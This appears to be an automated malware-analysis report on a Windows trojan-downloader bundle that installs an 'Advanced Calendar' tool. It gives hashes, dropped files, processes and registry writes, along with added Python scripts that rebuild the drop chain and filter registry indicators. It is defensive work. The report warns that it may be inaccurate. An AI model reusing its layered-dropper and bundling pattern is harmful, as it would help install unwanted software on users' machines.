Trojan-Downloader.Win32.Agent.wtkzi (Kaspersky), Gen:Variant.Zusy.178812 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5ef2c67ca0d12eac12e1f3db9dd7ddc3
SHA1: c53635e5603d37eb8c95b2027ab52a4e068391b3
SHA256: 1d7fc913b8190e48f0f38f5844cbcd5455f7ea251d447b0d2238b4648c653492
SSDeep: 24576:V6Yi atnhL9tsEyi xhtPl NcsJupQqku14w4:of gnhL9NyX4qsupn4
Size: 955891 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-27 07:38:55
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712
The Trojan injects its code into the following process(es):
Calendar.exe:3428
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process imapi.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
The process InstallHelper.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
The process InstallHelper.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)
The process nst6.tmp.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
The process CalendarServ.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
The process CalendarServ.exe:3156 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)
The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (27681 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6 (0 bytes)
The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
The process setup.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
The process Calendar.exe:3428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (340 bytes)
The process 291734.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
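The file activity above, read together with the process list, is enough to recover the drop chain of this bundle: the original NSIS installer writes nsd2.tmp\setup.exe, setup.exe writes YeaPlayer_br_IBD_Bundle.exe, that writes 291734.exe, and 291734.exe lays down the CalendarTool package (InstallHelper.exe, CalendarServ.exe, nst6.tmp.exe). The script below is an added example and not part of the Lavasoft report; it parses a constructed excerpt of this page's file-activity and process-activity sections and links each process to the processes it dropped by matching written file basenames against observed process names. The regexes assume the report's own line layout; the basename heuristic will not link processes started from binaries the sandbox never logged as written (rundll32.exe, imapi.exe here are system binaries).

```python
# Added example (not part of the Lavasoft report): reconstruct the drop chain
# from the "Process activity" and "File activity" sections of a report.
import re
from collections import defaultdict

# Constructed from the page's "Process activity" list (name:PID).
PROCESSES = [
    "imapi.exe:1932", "InstallHelper.exe:3084", "InstallHelper.exe:3480",
    "nst6.tmp.exe:2736", "nst6.tmp.exe:2804", "CalendarServ.exe:3180",
    "CalendarServ.exe:3156", "yeaplayer_br_ibd_bundle.exe:2328",
    "%original file name%.exe:1216", "rundll32.exe:1976", "setup.exe:1948",
    "setup.exe:348", "291734.exe:2712",
]

# Constructed excerpt of the page's "File activity" section (same layout).
REPORT = r"""
The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (27681 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (0 bytes)
The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
The process setup.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
The process 291734.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
"""

PROC_RE = re.compile(r"^The process (.+?):(\d+) makes changes in the file system\.$")
FILE_RE = re.compile(r"^(.+?) \((\d+) bytes\)$")


def parse_writes(text):
    """Return {process name (lower-case): [paths written]}; delete lists are skipped."""
    writes = defaultdict(list)
    proc, mode = None, None
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            proc, mode = m.group(1).lower(), None
            continue
        if line.startswith("The Trojan creates and/or writes"):
            mode = "write"
            continue
        if line.startswith("The Trojan deletes"):
            mode = "delete"
            continue
        m = FILE_RE.match(line)
        if m and proc and mode == "write":
            writes[proc].append(m.group(1))
    return writes


def drop_tree(writes, processes):
    """Map each dropper to the observed processes whose image it wrote (by basename)."""
    names = {p.rsplit(":", 1)[0].lower() for p in processes}
    tree = {}
    for dropper, paths in writes.items():
        for path in paths:
            base = path.rsplit("\\", 1)[-1].lower()
            if base in names and base != dropper:
                tree.setdefault(dropper, set()).add(base)
    return {k: sorted(v) for k, v in tree.items()}


def lineage(tree, root):
    """Depth-first list of (depth, process) starting at the root dropper."""
    out, stack, seen = [], [(0, root)], set()
    while stack:
        depth, node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        out.append((depth, node))
        for child in reversed(tree.get(node, [])):
            stack.append((depth + 1, child))
    return out


if __name__ == "__main__":
    tree = drop_tree(parse_writes(REPORT), PROCESSES)
    for depth, name in lineage(tree, "%original file name%.exe"):
        print("  " * depth + name)
```

The printed tree shows four layers of droppers before the first persistent component lands in %Program Files%\CalendarTool, which is why the detection names on this page disagree so widely: each vendor classified a different layer.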
Registry activity
The process imapi.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 D1 1C CB 70 45 7A A0 D0 0B 82 18 85 7F 8C 74"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"ControlFlags" = "1"
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"BitNames" = " ImapiDebugError ImapiDebugWarning ImapiDebugTrace ImapiDebugInfo ImapiDebugX ImapiDebugSort"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"Guid" = "8107d8e9-e323-49f5-bba2-abc35c243dca"
The process InstallHelper.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Control\TimeZoneInformation]
"ActiveTimeBias" = "4294967176"
[HKLM\SOFTWARE\CalendarTool]
"Version" = "2.0.0.11189"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\CalendarTool\INSTALL_MARK]
"Version" = "2.0.0.11189"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"UninstallString" = "%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe -Uninstall English"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\CalendarTool]
"PartnerId" = "YeaPlayer|br|IBD|Bundle"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayIcon" = "%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\CalendarTool]
"INSTALL_FIRST_TIME" = "2016-05-03_04:55:47"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayFullVersion" = "2.0.0.11189"
[HKLM\SOFTWARE\CalendarTool]
"UserId" = "61807c4bafc26bb2ed98e3e60f587cd6"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 5D 7F D0 86 D4 C2 1B B5 7E 30 04 72 D5 B9 A4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\CalendarTool]
"FrID" = "ClwS01UkXONz6DdlNQFq0y97Bu1dKUCqMKc="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayVersion" = "2.0.0.11189"
"Publisher" = "MEIXIAN XIE"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayName" = "Advanced Calendar 2.0.0.11189"
[HKLM\SOFTWARE\CalendarTool]
"parentName" = "setup.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\CalendarTool\2.0.0.11189]
"install_path" = "%Program Files%\CalendarTool\2.0.0.11189"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level"
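Most of the registry writes listed for InstallHelper.exe:3084 are not the installer's doing: the Cryptography\RNG Seed, the Tracing\* keys, the ESENT event-source registration, the Shell Folders cache and similar values are written by Windows components as a side effect of ordinary API calls and will appear in the sandbox trace of almost any program. The entries worth keeping are the ones the installer itself creates: HKLM\SOFTWARE\CalendarTool (Version, PartnerId, UserId, FrID, parentName), the Uninstall key {D9BAB2C9-5236-48c3-AF02-67E799F09BBD} and the install_path value. The script below is an added example and not part of the Lavasoft report; it parses a constructed excerpt of this registry block, drops entries whose key matches a noise list, and turns the survivors into reg query lines for a suspect host. The noise list reflects the author's judgement of what is environmental in this report format; extend it for other sandboxes.

```python
# Added example (not part of the Lavasoft report): separate environmental
# registry noise from installer-specific indicators in a sandbox trace.
import re

# Constructed excerpt of the InstallHelper.exe:3084 registry block on this page.
REG_TEXT = r"""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 5D 7F D0 86 D4 C2 1B B5 7E 30 04 72 D5 B9 A4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\CalendarTool]
"Version" = "2.0.0.11189"
"PartnerId" = "YeaPlayer|br|IBD|Bundle"
"UserId" = "61807c4bafc26bb2ed98e3e60f587cd6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"UninstallString" = "%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe -Uninstall English"
"Publisher" = "MEIXIAN XIE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\CalendarTool\2.0.0.11189]
"install_path" = "%Program Files%\CalendarTool\2.0.0.11189"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"(.*?)" = "(.*)"$')

# Keys Windows writes on its own when a process uses common APIs (author's list).
NOISE = [
    r"\\Microsoft\\Cryptography\\RNG$",            # CryptGenRandom reseeds
    r"\\Windows NT\\CurrentVersion\\Tracing\\",     # WPP/ETW tracing registration
    r"\\Services\\Eventlog\\Application\\ESENT$",  # ESENT event-source registration
    r"\\Microsoft\\ESENT\\Process\\",               # ESENT per-process debug key
    r"\\Explorer\\Shell Folders$",                  # shell folder path cache
    r"\\Explorer\\MountPoints2\\",                  # drive enumeration by the shell
    r"\\Internet Settings\\Cache\\Paths",           # WinINet cache initialisation
    r"\\Microsoft\\Rpc$",                           # UuidSequenceNumber from UuidCreate
    r"\\Control\\TimeZoneInformation$",             # ActiveTimeBias refresh
]


def parse_registry(text):
    """Return (key, value name, data) triples in report order."""
    key, rows = None, []
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VAL_RE.match(line)
        if m and key:
            rows.append((key, m.group(1), m.group(2)))
    return rows


def is_noise(key):
    return any(re.search(p, key, re.IGNORECASE) for p in NOISE)


def actionable(text):
    """Registry entries that remain after the environmental noise is removed."""
    return [row for row in parse_registry(text) if not is_noise(row[0])]


def reg_queries(rows):
    """Command lines an analyst can run on a suspect host to check each indicator."""
    return sorted({f'reg query "{key}" /v "{name}"' for key, name, _ in rows})


if __name__ == "__main__":
    for key, name, data in actionable(REG_TEXT):
        print(f"{key}\\{name} = {data}")
    print()
    print("\n".join(reg_queries(actionable(REG_TEXT))))
```

Of the ten values in the excerpt, six survive the filter, and all six point at the same three keys, which is the hunt list for this installer: the CalendarTool configuration key (whose UserId also names the Temp directory that 291734.exe was dropped into), the versioned install_path key and the Uninstall entry published under "MEIXIAN XIE".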
The process InstallHelper.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
